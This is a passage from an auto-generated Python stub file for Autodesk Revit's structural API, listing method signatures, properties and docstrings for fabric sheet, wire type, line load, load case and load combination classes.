minorStartOverhang, minorEndOverhang, numberOfWires): """ SetMajorLayoutAsFixedNumber(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, minorEndOverhang: float, numberOfWires: int) Sets the major layout pattern as FixedNumber, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. minorEndOverhang: The distance from the last wire to the edge of the sheet in the minor direction. numberOfWires: The number of the wires to set in the major direction. 
""" pass def SetMajorLayoutAsMaximumSpacing(self, overallWidth, minorStartOverhang, minorEndOverhang, spacing): """ SetMajorLayoutAsMaximumSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, minorEndOverhang: float, spacing: float) Sets the major layout pattern as MaximumSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. minorEndOverhang: The distance from the last wire to the edge of the sheet in the minor direction. spacing: The distance between the wires in the major direction. """ pass def SetMajorLayoutAsNumberWithSpacing(self, overallWidth, minorStartOverhang, numberOfWires, spacing): """ SetMajorLayoutAsNumberWithSpacing(self: FabricSheetType, overallWidth: float, minorStartOverhang: float, numberOfWires: int, spacing: float) Sets the major layout pattern as NumberWithSpacing, while specifying the needed parameters for this pattern. overallWidth: The entire width of the wire sheet in the minor direction. minorStartOverhang: The distance from the edge of the sheet to the first wire in the minor direction. numberOfWires: The number of the wires to set in the major direction. spacing: The distance between the wires in the major direction. """ pass def SetMinorLayoutAsActualSpacing(self, overallLength, majorStartOverhang, spacing): """ SetMinorLayoutAsActualSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, spacing: float) Sets the minor layout pattern as ActualSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. spacing: The distance between the wires in the minor direction. """ pass def SetMinorLayoutAsFixedNumber(self, overallLength, majorStartOverhang, majorEndOverhang, numberOfWires): """ SetMinorLayoutAsFixedNumber(self: FabricSheetType, overallLength: float, majorStartOverhang: float, majorEndOverhang: float, numberOfWires: int) Sets the major layout pattern as FixedNumber, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. majorEndOverhang: The distance from the last wire to the edge of the sheet in the major direction. numberOfWires: The number of the wires to set in the minor direction. """ pass def SetMinorLayoutAsMaximumSpacing(self, overallLength, majorStartOverhang, majorEndOverhang, spacing): """ SetMinorLayoutAsMaximumSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, majorEndOverhang: float, spacing: float) Sets the major layout pattern as MaximumSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. majorEndOverhang: The distance from the last wire to the edge of the sheet in the major direction. spacing: The distance between the wires in the minor direction. 
""" pass def SetMinorLayoutAsNumberWithSpacing(self, overallLength, majorStartOverhang, numberOfWires, spacing): """ SetMinorLayoutAsNumberWithSpacing(self: FabricSheetType, overallLength: float, majorStartOverhang: float, numberOfWires: int, spacing: float) Sets the major layout pattern as NumberWithSpacing, while specifying the needed parameters for this pattern. overallLength: The entire length of the wire sheet in the major direction. majorStartOverhang: The distance from the edge of the sheet to the first wire in the major direction. numberOfWires: The number of wires in the minor direction. spacing: The distance between the wires in the minor direction. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass MajorDirectionWireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FabricWireType to be used in the major direction. Get: MajorDirectionWireType(self: FabricSheetType) -> ElementId Set: MajorDirectionWireType(self: FabricSheetType) = value """ MajorEndOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the last wire (measured in the major direction). Get: MajorEndOverhang(self: FabricSheetType) -> float """ MajorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The lap splice length in the major direction. Get: MajorLapSpliceLength(self: FabricSheetType) -> float Set: MajorLapSpliceLength(self: FabricSheetType) = value """ MajorLayoutPattern = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The layout pattern in the major direction. Get: MajorLayoutPattern(self: FabricSheetType) -> FabricSheetLayoutPattern """ MajorNumberOfWires = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of wires used in the major direction (includes the first and last wires). Get: MajorNumberOfWires(self: FabricSheetType) -> int """ MajorReinforcementArea = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The area of fabric divided by the spacing of the wire in the major direction. Get: MajorReinforcementArea(self: FabricSheetType) -> float """ MajorSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The spacing between the wires in the major direction (not including the overhangs). Get: MajorSpacing(self: FabricSheetType) -> float """ MajorStartOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the first wire (measured in the major direction). Get: MajorStartOverhang(self: FabricSheetType) -> float """ Material = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the material assigned to wires. 
Get: Material(self: FabricSheetType) -> ElementId Set: Material(self: FabricSheetType) = value """ MinorDirectionWireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FabricWireType to be used in the minor direction. Get: MinorDirectionWireType(self: FabricSheetType) -> ElementId Set: MinorDirectionWireType(self: FabricSheetType) = value """ MinorEndOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the last wire (measured in the minor direction). Get: MinorEndOverhang(self: FabricSheetType) -> float """ MinorLapSpliceLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The lap splice length in the minor direction. Get: MinorLapSpliceLength(self: FabricSheetType) -> float Set: MinorLapSpliceLength(self: FabricSheetType) = value """ MinorLayoutPattern = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The layout pattern in the minor direction. Get: MinorLayoutPattern(self: FabricSheetType) -> FabricSheetLayoutPattern """ MinorNumberOfWires = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of wires used in the minor direction (includes the 1st and last wires). Get: MinorNumberOfWires(self: FabricSheetType) -> int """ MinorReinforcementArea = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The area of fabric divided by the spacing of the wire in the minor direction. Get: MinorReinforcementArea(self: FabricSheetType) -> float """ MinorSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The spacing between the wires in the minor direction (not including the overhangs). Get: MinorSpacing(self: FabricSheetType) -> float """ MinorStartOverhang = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance from the edge of the sheet to the first wire (measured in the minor direction). Get: MinorStartOverhang(self: FabricSheetType) -> float """ OverallLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of the wire sheet (including overhangs) in the major direction. Get: OverallLength(self: FabricSheetType) -> float """ OverallWidth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of the wire sheet (including overhangs) in the minor direction. Get: OverallWidth(self: FabricSheetType) -> float """ SheetMass = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass. Get: SheetMass(self: FabricSheetType) -> float Set: SheetMass(self: FabricSheetType) = value """ SheetMassUnit = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sheet mass per area unit. Get: SheetMassUnit(self: FabricSheetType) -> float """ class FabricTagComponentReference(Enum, IComparable, IFormattable, IConvertible): """ How FabricSheet tag text will be aligned to the FabricSheet symbol. 
enum FabricTagComponentReference, values: Diagonal (2), Intersection (3), MajorAxis (0), MinorAxis (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Diagonal = None Intersection = None MajorAxis = None MinorAxis = None value__ = None class FabricWireItem(object, IDisposable): """ Provides implementation for FabricWires stored in a Custom Fabric Sheet """ @staticmethod def Create(distance, wireLength, wireType): """ Create(distance: float, wireLength: float, wireType: ElementId) -> FabricWireItem Creates a new instance of a single Fabric wire. distance: The distance between this wire and the next wire in the Custom Fabric Sheet wireLength: Length of this wire wireType: The wire type of this wire Returns: The newly created Fabric wire instance. """ pass def Dispose(self): """ Dispose(self: FabricWireItem) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: FabricWireItem, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Distance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Distance to the next fabric wire item Get: Distance(self: FabricWireItem) -> float Set: Distance(self: FabricWireItem) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: FabricWireItem) -> bool """ WireLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Wire length for this wire item Get: WireLength(self: FabricWireItem) -> float Set: WireLength(self: FabricWireItem) = value """ WireType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The wire type of this wire item Get: WireType(self: FabricWireItem) -> ElementId Set: WireType(self: FabricWireItem) = value """ class FabricWireType(ElementType, IDisposable): """ A Fabric Wire Type object that is used in the generation of Fabric Wire. 
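Example (an illustrative sketch; assumes 'doc' is an open Document and a Transaction is active; the diameter value is arbitrary and expressed in decimal feet):
    wire_type_id = FabricWireType.CreateDefaultFabricWireType(doc)
    wire_type = doc.GetElement(wire_type_id)
    wire_type.WireDiameter = 0.02  # roughly a 6 mm wire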
""" @staticmethod def CreateDefaultFabricWireType(ADoc): """ CreateDefaultFabricWireType(ADoc: Document) -> ElementId Creates a new FabricWireType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass BendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Determines the bending diameter of the wire. Get: BendDiameter(self: FabricWireType) -> float Set: BendDiameter(self: FabricWireType) = value """ WireDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Determines the diameter of the wire. Get: WireDiameter(self: FabricWireType) -> float Set: WireDiameter(self: FabricWireType) = value """ class FamilyStructuralMaterialTypeFilter(ElementSlowFilter, IDisposable): """ A filter used to match families that have the given structural material type. FamilyStructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType, inverted: bool) FamilyStructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralMaterialType, inverted=None): """ __new__(cls: type, structuralMaterialType: StructuralMaterialType, inverted: bool) __new__(cls: type, structuralMaterialType: StructuralMaterialType) """ pass StructuralMaterialType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The family structural material type. Get: StructuralMaterialType(self: FamilyStructuralMaterialTypeFilter) -> StructuralMaterialType """ class Hub(Element, IDisposable): """ Represents a connection between two or more Autodesk Revit Elements. 
""" def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetHubConnectorManager(self): """ GetHubConnectorManager(self: Hub) -> ConnectorManager Retrieves the ConnectorManager of the Hub. Returns: The ConnectorManager. """ pass def GetOrigin(self): """ GetOrigin(self: Hub) -> XYZ Retrieves position of a Hub if such position is a 3D point. Returns: The origin. """ pass def HasOrigin(self): """ HasOrigin(self: Hub) -> bool Provides information if Hub has a specific location at point in 3D space. Returns: True if the Hub has a specific location at point in 3D space. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class ICodeCheckingParameterServer(IExternalServer): """ Interface for the code checking parameter server to implement. """ def PerformCodeChecking(self, data): """ PerformCodeChecking(self: ICodeCheckingParameterServer, data: CodeCheckingParameterServiceData) -> bool The server's method that will be called when Revit User clicks the Code Checking parameter's button from the properties palette. data: The Code Checking data. Returns: Indicates whether the code checking parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class IMemberForcesServer(IExternalServer): """ Interface for the Member Forces server to implement. """ def MemberForcesUpdate(self, data): """ MemberForcesUpdate(self: IMemberForcesServer, data: MemberForcesServiceData) -> bool The server's method that will be called when Revit User clicks Member Forces button in the MPP. data: The Moment Forces data. Returns: Indicates whether themember forces parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class IStructuralSectionsServer(IExternalServer): """ Interface for the section type parameter server to implement. """ def StructuralSectionsUpdate(self, data): """ StructuralSectionsUpdate(self: IStructuralSectionsServer, data: StructuralSectionsServiceData) -> bool The server's method that will be called when Revit User clicks the Section Type parameter's button in the family dialog. data: The Section Type data. Returns: Indicates whether the section type parameter server is executed successfully. """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LineLoad(LoadBase, IDisposable): """ An object that represents a force/moment applied in a linear manner. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelStick, forceVector1: XYZ, momentVector1: XYZ, symbol: LineLoadType) -> LineLoad Creates a new hosted line load within the project. aDoc: Document to which new line load will be added. host: The analytical model stick host element for the line Load. forceVector1: The applied 3d force vector. momentVector1: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set null to use default type. Returns: If successful, returns the newly created LineLoad, null otherwise. Create(aDoc: Document, host: AnalyticalModelSurface, curveIndex: int, forceVector1: XYZ, momentVector1: XYZ, symbol: LineLoadType) -> LineLoad Creates a new hosted line load within the project. aDoc: Document to which new line load will be added. host: The analytical model surface host element for the line Load. curveIndex: The index of a curve in analytical surface element starting from 0. Use the Autodesk::Revit::DB::Structure::AnalyticalModelSurface::GetLoops(Autodesk::Revit::DB::Structure::AnalyticalLoopType::All) method to obtain the appropriate curve index. The curve index has a unique value in the analytical surface element even if it contains more than one loop. The index should be obtained by iterating through all curves in all loops. forceVector1: The applied 3d force vector. momentVector1: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set null to use default type. Returns: If successful, returns the newly created LineLoad, null otherwise. Create(aDoc: Document, startPoint: XYZ, endPoint: XYZ, forceVector: XYZ, momentVector: XYZ, symbol: LineLoadType, plane: SketchPlane) -> LineLoad Creates a new non-hosted line load within the project using data at point. aDoc: Document to which new line load will be added. startPoint: The start point of line load, measured in decimal feet. endPoint: The end point of line load, measured in decimal feet. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the LineLoad. Set null to use default type. plane: The work plane of the LineLoad. Set null to use default plane. Returns: If successful, returns the newly created LineLoad, null otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurve(self): """ GetCurve(self: LineLoad) -> Curve Returns the curve that defines the geometry of the line load. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetPoints(self, startPoint, endPoint): """ SetPoints(self: LineLoad, startPoint: XYZ, endPoint: XYZ) -> bool Sets the start and end points of the line load. startPoint: The start point. endPoint: The end point. Returns: Returns true if successful, false otherwise. 
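Example (an illustrative sketch; 'line_load' is assumed to be an existing LineLoad modified inside an active Transaction; coordinates are in decimal feet):
    from Autodesk.Revit.DB import XYZ
    moved = line_load.SetPoints(XYZ(0, 0, 0), XYZ(10, 0, 0))  # False means the new points were rejected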
""" pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass EndPoint = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the three dimensional location of the end point for the line load. Get: EndPoint(self: LineLoad) -> XYZ """ ForceVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the start point of the line load, oriented according to OrientTo setting. Get: ForceVector1(self: LineLoad) -> XYZ Set: ForceVector1(self: LineLoad) = value """ ForceVector2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the end point of the line load, oriented according to OrientTo setting. Get: ForceVector2(self: LineLoad) -> XYZ Set: ForceVector2(self: LineLoad) = value """ IsProjected = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is projected. Get: IsProjected(self: LineLoad) -> bool Set: IsProjected(self: LineLoad) = value """ IsUniform = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load is uniform. Get: IsUniform(self: LineLoad) -> bool """ MomentVector1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the start point of the line load, oriented according to OrientTo setting. Get: MomentVector1(self: LineLoad) -> XYZ Set: MomentVector1(self: LineLoad) = value """ MomentVector2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the end point of the line load, oriented according to OrientTo setting. Get: MomentVector2(self: LineLoad) -> XYZ Set: MomentVector2(self: LineLoad) = value """ StartPoint = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the three dimensional location of the start point for the line load. Get: StartPoint(self: LineLoad) -> XYZ """ class LineLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LoadCase(Element, IDisposable): """ An object that represents a load case. """ @staticmethod def Create(document, name, natureId, *__args): """ Create(document: Document, name: str, natureId: ElementId, loadCaseCategory: LoadCaseCategory) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. loadCaseCategory: The predefined load case category. Returns: The newly created load case element if successful, null otherwise. Create(document: Document, name: str, natureId: ElementId, subcategoryId: ElementId) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. subcategoryId: The load case subcategory ID. Can be one of the predefined or user-defined load case categories. Built-in structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) subcategories are: Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesDead, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesLive, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesWind, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesSnow, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesRoofLive, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesAccidental, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesTemperature, Autodesk.Revit.DB.BuiltInCategory.OST_LoadCasesSeismic. Returns: The newly created load case element if successful, null otherwise. Create(document: Document, name: str, natureId: ElementId, natureCategory: LoadNatureCategory) -> LoadCase Creates a new LoadCase. document: The Document to which new load case element will be added. name: The name of the load case. natureId: The load nature ID. natureCategory: The predefined load nature category. Returns: The newly created load case element if successful, null otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def IsLoadCaseSubcategoryId(self, loadCaseSubcategoryId): """ IsLoadCaseSubcategoryId(self: LoadCase, loadCaseSubcategoryId: ElementId) -> bool Checks whether the provided element ID refers to a subcategory of the Structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) category - either built-in or user-defined. loadCaseSubcategoryId: The ID to check. Returns: True if the ID refers to a load case category element, false otherwise. """ pass def IsLoadNatureId(self, natureId): """ IsLoadNatureId(self: LoadCase, natureId: ElementId) -> bool Checks whether the provided element ID refers to a LoadNature element. natureId: The ID to check. Returns: True if the ID refers to a LoadNature element, false otherwise. """ pass @staticmethod def IsNumberUnique(document, number): """ IsNumberUnique(document: Document, number: int) -> bool Checks that a given number is unique among all load cases. number: The number to check. Returns: True if the given number is unique among all load cases, false otherwise. 
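Example (an illustrative sketch; assumes 'doc' is an open Document and a Transaction is active; the nature and case names, and the number 42, are made up for the example):
    nature = LoadNature.Create(doc, "Example Nature")
    if LoadCase.IsNumberUnique(doc, 42):
        case = LoadCase.Create(doc, "Example Case", nature.Id, LoadCaseCategory.Dead)
        case.Number = 42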
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass NatureCategory = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The nature category of the load case. Get: NatureCategory(self: LoadCase) -> LoadNatureCategory Set: NatureCategory(self: LoadCase) = value """ NatureId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The nature ID of the load case. Get: NatureId(self: LoadCase) -> ElementId Set: NatureId(self: LoadCase) = value """ Number = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns unique load case number. Get: Number(self: LoadCase) -> int Set: Number(self: LoadCase) = value """ SubcategoryId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Build-in or user defined subcategory of Structural Load Cases (Autodesk.Revit.DB.BuiltInCategory.OST_LoadCases) category. Get: SubcategoryId(self: LoadCase) -> ElementId Set: SubcategoryId(self: LoadCase) = value """ class LoadCaseCategory(Enum, IComparable, IFormattable, IConvertible): """ Specifies load case category. enum LoadCaseCategory, values: Accidental (5), Dead (0), Live (1), RoofLive (4), Seismic (7), Snow (3), Temperature (6), Wind (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Accidental = None Dead = None Live = None RoofLive = None Seismic = None Snow = None Temperature = None value__ = None Wind = None class LoadCombination(Element, IDisposable): """ An object that represents a load combination. """ @staticmethod def Create(document, name, type=None, state=None): """ Create(document: Document, name: str) -> LoadCombination Creates a new default LoadCombination. document: The Document to which new load combination element will be added. name: The name of the load combination. Returns: The newly created load combination element if successful, ll otherwise. 
Create(document: Document, name: str, type: LoadCombinationType, state: LoadCombinationState) -> LoadCombination Creates a new LoadCombination. document: The Document to which new load combination element will be added. name: The name of the load combination. type: The type of the load combination. state: The state of the load combination. Returns: The newly created load combination element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCaseAndCombinationIds(self): """ GetCaseAndCombinationIds(self: LoadCombination) -> IList[ElementId] Returns collection of the load combination case and combination IDs. Returns: A collection of the load combination case and combination IDs. """ pass def GetComponents(self): """ GetComponents(self: LoadCombination) -> IList[LoadComponent] Returns collection of the load combination components. Returns: A collection of the load combination components. """ pass def GetUsageIds(self): """ GetUsageIds(self: LoadCombination) -> IList[ElementId] Returns collection of the load combination usage IDs. Returns: A collection of the load combination usage IDs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetComponents(self, components): """ SetComponents(self: LoadCombination, components: IList[LoadComponent]) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetUsageIds(self, usageIds): """ SetUsageIds(self: LoadCombination, usageIds: IList[ElementId]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass IsThirdPartyGenerated = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Indicates if the load combination was created by API. Get: IsThirdPartyGenerated(self: LoadCombination) -> bool """ State = property(lambda self: 